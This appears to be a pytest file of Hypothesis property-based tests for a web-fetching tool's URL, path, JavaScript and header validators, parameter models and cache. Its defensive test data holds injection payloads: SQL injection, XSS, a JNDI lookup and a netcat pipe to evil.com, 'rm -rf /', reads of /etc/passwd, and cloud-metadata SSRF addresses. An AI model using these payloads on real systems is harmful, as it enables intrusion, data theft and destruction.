"""Property-based fuzzing tests for validators, params models, and cache using Hypothesis.

Tests validators (validate_url, validate_local_file_path, validate_js_script, etc.),
Pydantic parameter models (FetchParams, SpiderParams, etc.), and the cache system
with property-based tests generated by Hypothesis.

Uses custom strategies for URLs, domains, and other structured inputs to maintain
validity while testing edge cases.
"""

from __future__ import annotations

import json
import tempfile
from pathlib import Path
from typing import Any
from unittest import mock

import pytest
from hypothesis import HealthCheck, given, settings, strategies as st

from loom.cache import CacheStore
from loom.params import (
    BotasaurusParams,
    CamoufoxParams,
    CacheClearParams,
    CacheStatsParams,
    DeepParams,
    FetchParams,
    GitHubParams,
    SearchParams,
    SpiderParams,
)
from loom.validators import (
    PathSafetyError,
    UrlSafetyError,
    cap_chars,
    filter_headers,
    filter_provider_config,
    validate_js_script,
    validate_local_file_path,
    validate_url,
)


# ============================================================================
# Custom Strategies for Structured Inputs
# ============================================================================


def valid_http_urls() -> st.SearchStrategy[str]:
    """Strategy for generating valid HTTP(S) URLs with public IPs."""
    schemes = st.just("http") | st.just("https")
    public_ips = st.sampled_from([
        "8.8.8.8", "1.1.1.1", "44.55.66.77", "99.88.77.66", "8.26.56.26",
    ])
    paths = st.text(
        alphabet=st.characters(
            blacklist_categories=("Cc", "Cs"),
            blacklist_characters="\r\n",
        ),
        min_size=0, max_size=100,
    ).filter(lambda s: not any(c in s for c in " \r\n<>"))

    def build_url(scheme: str, ip: str, path: str) -> str:
        return f"{scheme}://{ip}/{path}" if path else f"{scheme}://{ip}/"

    return st.builds(build_url, schemes, public_ips, paths)


def safe_javascript() -> st.SearchStrategy[str]:
    """Strategy for generating safe JavaScript."""
    statements = st.sampled_from([
        "console.log('hello');",
        "const x = 42;",
        "if (true) { console.log('test'); }",
        "const arr = [1, 2, 3];",
        "const obj = {a: 1, b: 2};",
    ])
    return st.lists(statements, min_size=1, max_size=5).map(lambda s: "\n".join(s))


def unsafe_javascript() -> st.SearchStrategy[str]:
    """Strategy for generating JavaScript with blocked APIs."""
    dangerous = st.sampled_from([
        "fetch('https://evil.com')",
        "eval('malicious')",
        "new Function('return this')",
        "XMLHttpRequest",
    ])
    return st.builds(lambda d: f"const bad = {d};", dangerous)


def safe_file_paths() -> st.SearchStrategy[str]:
    """Strategy for generating safe file paths."""
    base = str(Path.home() / ".loom")
    component = st.text(
        alphabet="abcdefghijklmnopqrstuvwxyz0123456789_",
        min_size=1, max_size=20,
    )

    def build_path(components: list[str]) -> str:
        if not components:
            return base
        parts = [base] + components + ["file.txt"]
        return str(Path(*parts))

    return st.builds(build_path, st.lists(component, max_size=3))


# ============================================================================
# Property Tests: validate_url
# ============================================================================


@pytest.mark.property
class TestValidateUrlProperties:
    """Property-based tests for validate_url() SSRF prevention."""

    @given(st.text())
    @settings(max_examples=100)
    def test_never_crashes_on_arbitrary_text(self, text: str) -> None:
        """validate_url should never crash, always raise or return str."""
        try:
            result = validate_url(text)
            assert isinstance(result, str)
        except (UrlSafetyError, ValueError):
            pass

    @given(valid_http_urls())
    @settings(max_examples=50)
    def test_valid_public_urls_pass(self, url: str) -> None:
        """Public URLs with valid schemes should pass validation."""
        result = validate_url(url)
        assert result == url

    @given(st.sampled_from([
        "http://127.0.0.1/", "http://localhost/", "http://0.0.0.0/",
        "http://169.254.169.254/", "http://::1/",
    ]))
    @settings(max_examples=10)
    def test_rejects_private_ips(self, url: str) -> None:
        """Private/loopback IPs should be rejected."""
        with pytest.raises(UrlSafetyError):
            validate_url(url)

    @given(valid_http_urls())
    @settings(max_examples=30)
    def test_returns_same_url_on_success(self, url: str) -> None:
        """Successful validation should return the input URL unchanged."""
        result = validate_url(url)
        assert result == url

    def test_ipv4_mapped_ipv6_private_rejected(self) -> None:
        """IPv4-mapped IPv6 addresses pointing to private IPs should be rejected."""
        with mock.patch("socket.getaddrinfo") as mock_getaddrinfo:
            mock_getaddrinfo.return_value = [(10, 1, 6, "", ("::ffff:127.0.0.1", 0, 0, 0))]
            with pytest.raises(UrlSafetyError):
                validate_url("http://evil.internal.example/")


@pytest.mark.property
class TestValidateLocalFilePath:
    """Property-based tests for validate_local_file_path()."""

    @given(safe_file_paths())
    @settings(max_examples=50)
    def test_valid_paths_under_base_pass(self, path: str) -> None:
        """Paths under allowed base should pass."""
        base = str(Path.home() / ".loom")
        result = validate_local_file_path(path, base)
        assert isinstance(result, str)
        assert str(Path(result)).startswith(str(Path(base).resolve()))

    @given(st.just(""))
    @settings(max_examples=5)
    def test_rejects_empty_path(self, empty: str) -> None:
        """Empty path should be rejected."""
        with pytest.raises(PathSafetyError):
            validate_local_file_path(empty)

    @given(st.none())
    @settings(max_examples=5)
    def test_rejects_none_path(self, none_val: None) -> None:
        """None path should be rejected."""
        with pytest.raises((PathSafetyError, TypeError)):
            validate_local_file_path(none_val)  # type: ignore


@pytest.mark.property
class TestValidateJsScript:
    """Property-based tests for validate_js_script()."""

    @given(safe_javascript())
    @settings(max_examples=50)
    def test_safe_scripts_pass(self, script: str) -> None:
        """Safe JavaScript should pass validation."""
        result = validate_js_script(script)
        assert result == script

    @given(unsafe_javascript())
    @settings(max_examples=30)
    def test_dangerous_apis_rejected(self, script: str) -> None:
        """Scripts with dangerous APIs should be rejected."""
        with pytest.raises(ValueError):
            validate_js_script(script)

    @given(st.text(min_size=1))
    @settings(max_examples=20)
    def test_never_crashes_on_arbitrary_text(self, text: str) -> None:
        """Should never crash on arbitrary text."""
        try:
            result = validate_js_script(text)
            assert isinstance(result, str)
        except ValueError:
            pass


@pytest.mark.property
class TestCapChars:
    """Property-based tests for cap_chars()."""

    @given(st.integers())
    @settings(max_examples=100)
    def test_always_returns_positive_int(self, n: int) -> None:
        """cap_chars should always return a positive integer."""
        result = cap_chars(n)
        assert isinstance(result, int)
        assert result > 0

    @given(st.integers(min_value=1, max_value=200_000))
    @settings(max_examples=50)
    def test_valid_range_unchanged(self, n: int) -> None:
        """Values in valid range [1, MAX_CAP] should be returned unchanged."""
        result = cap_chars(n)
        assert result == n

    @given(st.integers(min_value=-1000, max_value=0))
    @settings(max_examples=20)
    def test_zero_or_negative_capped(self, n: int) -> None:
        """Zero or negative values should be capped to max."""
        result = cap_chars(n)
        assert result == 200_000

    @given(st.integers(min_value=200_001))
    @settings(max_examples=20)
    def test_over_max_capped(self, n: int) -> None:
        """Values over max should be capped to max."""
        result = cap_chars(n)
        assert result == 200_000


@pytest.mark.property
class TestFilterHeaders:
    """Property-based tests for filter_headers()."""

    @given(st.dictionaries(
        keys=st.sampled_from(["Accept", "User-Agent", "Referer"]),
        values=st.text(max_size=512).filter(lambda s: "\r" not in s and "\n" not in s),
        min_size=1, max_size=5,
    ))
    @settings(max_examples=50)
    def test_safe_headers_pass(self, headers: dict[str, str]) -> None:
        """Safe headers from allowlist should pass."""
        result = filter_headers(headers)
        assert result is not None
        for key in result:
            assert key.lower() in {
                "accept", "accept-encoding", "accept-language", "cache-control",
                "dnt", "pragma", "referer", "user-agent", "x-requested-with"
            }

    @given(st.dictionaries(
        keys=st.sampled_from(["Authorization", "Cookie", "Host"]),
        values=st.text(max_size=100),
    ))
    @settings(max_examples=30)
    def test_dangerous_headers_rejected(self, headers: dict[str, str]) -> None:
        """Security-sensitive headers should be filtered out."""
        result = filter_headers(headers)
        if result:
            for key in result:
                assert key.lower() not in {"authorization", "cookie", "host"}

    @given(st.just(None))
    @settings(max_examples=5)
    def test_none_headers_unchanged(self, headers: None) -> None:
        """None input should return None."""
        result = filter_headers(headers)
        assert result is None


@pytest.mark.property
class TestFilterProviderConfig:
    """Property-based tests for filter_provider_config()."""

    @given(st.dictionaries(
        keys=st.sampled_from(["include_domains", "exclude_domains", "start_date"]),
        values=st.text(max_size=100),
    ))
    @settings(max_examples=30)
    def test_whitelisted_config_pass(self, config: dict[str, Any]) -> None:
        """Config keys in allowlist should pass."""
        result = filter_provider_config("exa", config)
        for key in result:
            assert key in {"include_domains", "exclude_domains", "start_date", "end_date", "type", "category"}

    @given(st.dictionaries(
        keys=st.sampled_from(["evil_key", "injection", "bypass"]),
        values=st.text(max_size=100),
    ))
    @settings(max_examples=20)
    def test_unknown_keys_rejected(self, config: dict[str, Any]) -> None:
        """Unknown config keys should be rejected."""
        result = filter_provider_config("exa", config)
        for key in result:
            assert key in {"include_domains", "exclude_domains", "start_date", "end_date", "type", "category"}


# ============================================================================
# Property Tests: Pydantic Parameter Models
# ============================================================================


@pytest.mark.property
class TestFetchParamsProperties:
    """Property-based tests for FetchParams Pydantic model."""

    @given(st.builds(
        FetchParams,
        url=valid_http_urls(),
        mode=st.sampled_from(["http", "stealthy", "dynamic"]),
        max_chars=st.integers(min_value=1000, max_value=100000),
        retries=st.integers(min_value=0, max_value=3),
        timeout=st.integers(min_value=1, max_value=120) | st.none(),
    ))
    @settings(max_examples=50)
    def test_valid_params_serialize(self, params: FetchParams) -> None:
        """Valid FetchParams should serialize to dict."""
        data = params.model_dump()
        assert isinstance(data, dict)
        assert "url" in data

    @given(st.text())
    @settings(max_examples=30)
    def test_invalid_url_rejected(self, bad_url: str) -> None:
        """Invalid URLs should be rejected."""
        try:
            FetchParams(url=bad_url)
            assert "://" in bad_url
        except (ValueError, UrlSafetyError):
            pass

    @given(st.integers(min_value=-1) | st.integers(min_value=4))
    @settings(max_examples=10)
    def test_invalid_retries_rejected(self, retries: int) -> None:
        """Retries outside 0-3 should be rejected."""
        if retries < 0 or retries > 3:
            with pytest.raises(ValueError):
                FetchParams(url="http://8.8.8.8/", retries=retries)


@pytest.mark.property
class TestSpiderParamsProperties:
    """Property-based tests for SpiderParams Pydantic model."""

    @given(st.builds(
        SpiderParams,
        urls=st.lists(valid_http_urls(), min_size=1, max_size=10),
        mode=st.sampled_from(["http", "stealthy", "dynamic"]),
        max_chars_each=st.integers(min_value=500, max_value=50000),
        concurrency=st.integers(min_value=1, max_value=50),
    ))
    @settings(max_examples=40)
    def test_valid_params_serialize(self, params: SpiderParams) -> None:
        """Valid SpiderParams should serialize to dict."""
        data = params.model_dump()
        assert isinstance(data, dict)
        assert "urls" in data

    @given(st.just([]))
    @settings(max_examples=5)
    def test_empty_urls_rejected(self, urls: list[str]) -> None:
        """Empty URL list should be rejected."""
        with pytest.raises(ValueError):
            SpiderParams(urls=urls)


@pytest.mark.property
class TestSearchParamsProperties:
    """Property-based tests for SearchParams Pydantic model."""

    @given(st.builds(
        SearchParams,
        query=st.text(min_size=1, max_size=2000),
        max_results=st.integers(min_value=1, max_value=100),
    ))
    @settings(max_examples=50)
    def test_valid_params_serialize(self, params: SearchParams) -> None:
        """Valid SearchParams should serialize to dict."""
        data = params.model_dump()
        assert isinstance(data, dict)
        assert "query" in data

    @given(st.just(""))
    @settings(max_examples=5)
    def test_empty_query_rejected(self, query: str) -> None:
        """Empty query should be rejected."""
        with pytest.raises(ValueError):
            SearchParams(query=query)

    @given(st.text(min_size=2001))
    @settings(max_examples=5)
    def test_query_too_long_rejected(self, query: str) -> None:
        """Query >2000 chars should be rejected."""
        with pytest.raises(ValueError):
            SearchParams(query=query)


@pytest.mark.property
class TestDeepParamsProperties:
    """Property-based tests for DeepParams Pydantic model."""

    @given(st.builds(
        DeepParams,
        query=st.text(min_size=1, max_size=2000),
        max_results=st.integers(min_value=1, max_value=100),
    ))
    @settings(max_examples=40)
    def test_valid_params_serialize(self, params: DeepParams) -> None:
        """Valid DeepParams should serialize to dict."""
        data = params.model_dump()
        assert isinstance(data, dict)
        assert "query" in data


@pytest.mark.property
class TestGitHubParamsProperties:
    """Property-based tests for GitHubParams Pydantic model."""

    @given(st.builds(
        GitHubParams,
        query=st.text(min_size=1, max_size=500),
        per_page=st.integers(min_value=1, max_value=100),
    ))
    @settings(max_examples=40)
    def test_valid_params_serialize(self, params: GitHubParams) -> None:
        """Valid GitHubParams should serialize to dict."""
        data = params.model_dump()
        assert isinstance(data, dict)
        assert "query" in data


@pytest.mark.property
class TestCamoufoxParamsProperties:
    """Property-based tests for CamoufoxParams Pydantic model."""

    @given(st.builds(
        CamoufoxParams,
        url=valid_http_urls(),
        max_chars=st.integers(min_value=1000, max_value=100000),
        wait_time=st.integers(min_value=0, max_value=60),
        timeout=st.integers(min_value=1, max_value=120),
    ))
    @settings(max_examples=40)
    def test_valid_params_serialize(self, params: CamoufoxParams) -> None:
        """Valid CamoufoxParams should serialize to dict."""
        data = params.model_dump()
        assert isinstance(data, dict)
        assert "url" in data


@pytest.mark.property
class TestBotasaurusParamsProperties:
    """Property-based tests for BotasaurusParams Pydantic model."""

    @given(st.builds(
        BotasaurusParams,
        url=valid_http_urls(),
        max_chars=st.integers(min_value=1000, max_value=100000),
    ))
    @settings(max_examples=40)
    def test_valid_params_serialize(self, params: BotasaurusParams) -> None:
        """Valid BotasaurusParams should serialize to dict."""
        data = params.model_dump()
        assert isinstance(data, dict)
        assert "url" in data


@pytest.mark.property
class TestCacheParamsProperties:
    """Property-based tests for cache-related params."""

    @given(st.builds(
        CacheStatsParams,
        max_results=st.integers(min_value=1, max_value=1000),
        offset=st.integers(min_value=0, max_value=1000000),
    ))
    @settings(max_examples=40)
    def test_cache_stats_params_valid(self, params: CacheStatsParams) -> None:
        """Valid CacheStatsParams should serialize."""
        data = params.model_dump()
        assert isinstance(data, dict)

    @given(st.builds(
        CacheClearParams,
        days_old=st.integers(min_value=0, max_value=365) | st.none(),
        all=st.booleans(),
    ))
    @settings(max_examples=30)
    def test_cache_clear_params_valid(self, params: CacheClearParams) -> None:
        """Valid CacheClearParams should serialize."""
        data = params.model_dump()
        assert isinstance(data, dict)


# ============================================================================
# Property Tests: Cache System
# ============================================================================


@pytest.mark.property
class TestCacheStoreProperties:
    """Property-based tests for CacheStore."""

    @given(
        key=st.text(min_size=1, max_size=200),
        data=st.dictionaries(
            keys=st.text(min_size=1, max_size=20),
            values=st.text(max_size=100) | st.integers() | st.booleans(),
            min_size=1, max_size=10,
        ),
    )
    @settings(max_examples=50)
    def test_cache_put_get_roundtrip(self, key: str, data: dict[str, Any]) -> None:
        """cache_put() then cache_get() should return same data."""
        with tempfile.TemporaryDirectory() as tmpdir:
            store = CacheStore(tmpdir)
            store.put(key, data)
            retrieved = store.get(key)
            assert retrieved == data

    @given(st.text(min_size=1, max_size=200))
    @settings(max_examples=50)
    def test_cache_get_nonexistent_returns_none(self, key: str) -> None:
        """cache_get() on nonexistent key should return None."""
        with tempfile.TemporaryDirectory() as tmpdir:
            store = CacheStore(tmpdir)
            result = store.get(key)
            assert result is None

    @given(
        key1=st.text(min_size=1, max_size=100),
        key2=st.text(min_size=1, max_size=100),
        data1=st.dictionaries(keys=st.text(min_size=1, max_size=20), values=st.text(max_size=100)),
        data2=st.dictionaries(keys=st.text(min_size=1, max_size=20), values=st.text(max_size=100)),
    )
    @settings(max_examples=40)
    def test_cache_keys_isolated(self, key1: str, key2: str, data1: dict[str, Any], data2: dict[str, Any]) -> None:
        """Different cache keys should not interfere."""
        if key1 == key2:
            return

        with tempfile.TemporaryDirectory() as tmpdir:
            store = CacheStore(tmpdir)
            store.put(key1, data1)
            store.put(key2, data2)
            assert store.get(key1) == data1
            assert store.get(key2) == data2

    @given(
        key=st.text(min_size=1, max_size=200),
        data=st.binary(min_size=10, max_size=1000),
    )
    @settings(max_examples=30)
    def test_cache_handles_binary_data(self, key: str, data: bytes) -> None:
        """Cache should handle binary-encoded data via JSON."""
        import base64

        with tempfile.TemporaryDirectory() as tmpdir:
            store = CacheStore(tmpdir)
            encoded = base64.b64encode(data).decode("utf-8")
            payload = {"data": encoded}
            store.put(key, payload)
            retrieved = store.get(key)
            assert retrieved == payload
            assert base64.b64decode(retrieved["data"]) == data

    @given(st.text(min_size=1, max_size=200))
    @settings(max_examples=30)
    def test_cache_key_normalization(self, key: str) -> None:
        """Cache should normalize keys consistently."""
        with tempfile.TemporaryDirectory() as tmpdir:
            store = CacheStore(tmpdir)
            data = {"test": "value"}
            store.put(key, data)
            result1 = store.get(key)
            result2 = store.get(key)
            assert result1 == data
            assert result2 == data

    @given(
        key=st.text(min_size=1, max_size=200),
        data=st.dictionaries(
            keys=st.text(min_size=1, max_size=20),
            values=st.text(max_size=10000),
            min_size=1, max_size=5,
        ),
    )
    @settings(max_examples=20)
    def test_cache_handles_large_values(self, key: str, data: dict[str, Any]) -> None:
        """Cache should handle large JSON values."""
        with tempfile.TemporaryDirectory() as tmpdir:
            store = CacheStore(tmpdir)
            store.put(key, data)
            retrieved = store.get(key)
            assert retrieved == data


@pytest.mark.property
class TestCacheEdgeCases:
    """Property-based tests for cache edge cases."""

    @given(st.text(min_size=100, max_size=1000))
    @settings(max_examples=20)
    def test_cache_unicode_keys(self, unicode_key: str) -> None:
        """Cache should handle Unicode keys via SHA-256 hashing."""
        with tempfile.TemporaryDirectory() as tmpdir:
            store = CacheStore(tmpdir)
            data = {"unicode_test": True}
            store.put(unicode_key, data)
            retrieved = store.get(unicode_key)
            assert retrieved == data

    @given(
        key=st.text(min_size=1, max_size=200),
        data=st.dictionaries(
            keys=st.text(min_size=1, max_size=20),
            values=st.lists(st.text(max_size=100), max_size=5),
            min_size=1, max_size=10,
        ),
    )
    @settings(max_examples=30)
    def test_cache_complex_nested_structures(self, key: str, data: dict[str, Any]) -> None:
        """Cache should handle complex nested JSON structures."""
        with tempfile.TemporaryDirectory() as tmpdir:
            store = CacheStore(tmpdir)
            store.put(key, data)
            retrieved = store.get(key)
            assert retrieved == data
            assert json.dumps(retrieved) == json.dumps(data)


# ============================================================================
# Integration Tests with Injection Patterns
# ============================================================================


@pytest.mark.property
class TestParamInjectionResistance:
    """Property-based tests for injection resistance across all param models."""

    injection_patterns = st.sampled_from([
        "'; DROP TABLE users; --",
        "<script>alert('xss')</script>",
        "../../etc/passwd",
        "${jndi:ldap://evil.com/a}",
        "$(whoami)",
        "`cat /etc/passwd`",
        "| nc evil.com 1234",
        "&& rm -rf /",
    ])

    @given(injection_patterns)
    @settings(max_examples=30)
    def test_url_field_resists_injection(self, injection: str) -> None:
        """URL field should not accept injection patterns."""
        try:
            FetchParams(url=injection)
            assert injection.startswith(("http://", "https://"))
        except (ValueError, UrlSafetyError):
            pass

    @given(injection_patterns)
    @settings(max_examples=20)
    def test_query_field_resists_injection(self, injection: str) -> None:
        """Query field should sanitize injection patterns."""
        try:
            SearchParams(query=injection)
            assert len(injection) <= 2000
        except ValueError:
            pass

    @given(st.dictionaries(
        keys=injection_patterns,
        values=st.text(max_size=100),
    ))
    @settings(max_examples=20)
    def test_headers_resist_injection(self, headers: dict[str, str]) -> None:
        """Headers should filter injection patterns."""
        result = filter_headers(headers)
        if result:
            for key, value in result.items():
                assert key.lower() not in {
                    "authorization", "cookie", "host", "origin",
                }
                assert "\r" not in value
                assert "\n" not in value


if __name__ == "__main__":
    pytest.main([__file__, "-v", "-m", "property"])
